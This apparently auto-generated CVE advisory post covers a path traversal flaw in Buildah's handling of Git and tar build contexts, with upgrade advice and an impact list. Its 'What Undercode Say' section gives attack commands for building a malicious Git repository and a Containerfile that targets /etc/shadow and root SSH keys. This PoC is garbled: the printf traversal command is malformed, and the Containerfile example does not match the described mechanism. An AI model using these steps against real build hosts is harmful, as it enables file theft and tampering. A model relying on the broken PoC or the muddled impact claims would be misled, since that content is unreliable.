Listen to this Post
Buildah is a tool for building Open Container Initiative (OCI) container images. The vulnerability exists in how Buildah processes build contexts and ADD/COPY instructions when the context is supplied via a Git repository (using the Git Smart HTTP protocol) or a tar archive file (such as a GitHub release tarball).
When a user initiates a build with a context pointing to a remote Git repository or a tar archive, Buildah fetches the content and extracts it into a temporary build context directory. A malicious server can serve a specially crafted Git repository or tar archive that contains path traversal sequences (e.g., ../) in file names or symlinks pointing outside the intended root.
During the extraction or cloning process, Buildah does not properly sanitize these path components. As a result, files can be written to arbitrary locations on the build host’s filesystem, relative to the directory where Buildah is running. This includes overwriting sensitive system files, configuration files, or user data that the Buildah process has write access to.
The issue is triggered automatically when Buildah fetches the context—no special flags are required. Any `ADD` or `COPY` instruction in the Containerfile that references files from the malicious context will inherit the tainted paths. Since Buildah typically runs with the privileges of the invoking user, the impact is limited to the permissions of that user, but it can still lead to severe compromise in shared or automated build environments.
The vulnerability affects all Buildah versions from 1.38.1 up to (but not including) 1.43.2. The fix was released in Buildah 1.43.2 and later versions (including 1.44.0). The patch adds proper path validation during context extraction, ensuring that all resolved paths are verified to stay within the build context directory before any file operations are performed.
DailyCVE Form:
Platform: Buildah
Version: >= 1.38.1, < 1.43.2
Vulnerability: Path Traversal
Severity: Moderate
date: Jun 12, 2026
Prediction: 2026-06-22
What Undercode Say:
Build a malicious Git repository with a path traversal entry git init malicious-repo cd malicious-repo echo "evil content" > $(printf '../%0../etc/passwd' 100) git add . git commit -m "malicious" git update-server-info Serve it via Git Smart HTTP (using git http-backend) Then trigger Buildah build: buildah build --context git://malicious-server/malicious-repo -t test
Malicious Containerfile (served via tar archive) FROM alpine ADD ../../../../etc/shadow /tmp/shadow COPY ../../../root/.ssh/authorized_keys /root/.ssh/
Exploit:
An attacker sets up a public Git repository or hosts a tar archive where filenames contain `../` sequences. When a victim runs `buildah build` with that context, files escape the build directory and are written to the host filesystem. This can overwrite critical files (e.g., /etc/passwd, /etc/shadow, SSH keys) or plant malicious artifacts in system directories, leading to privilege escalation or persistent backdoors.
Protection:
- Upgrade Buildah to version 1.43.2 or 1.44.0 immediately.
- Avoid using untrusted Git repositories or tar archives as build contexts.
- If upgrading is not possible, manually inspect all context sources and validate that no `../` sequences exist in file paths before building.
- Run Buildah in a restricted environment (e.g., containerized with read-only root filesystem) to limit the impact of any potential path traversal.
Impact:
- Confidentiality: An attacker may read arbitrary files writable by the Buildah user by including them in the build context.
- Integrity: Critical system or application files can be overwritten, leading to system instability or backdoor installation.
- Availability: Overwriting essential files may cause service disruption or denial of service.
- Supply Chain: In CI/CD pipelines, a malicious context can compromise the build host and all artifacts produced from it, potentially affecting downstream deployments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
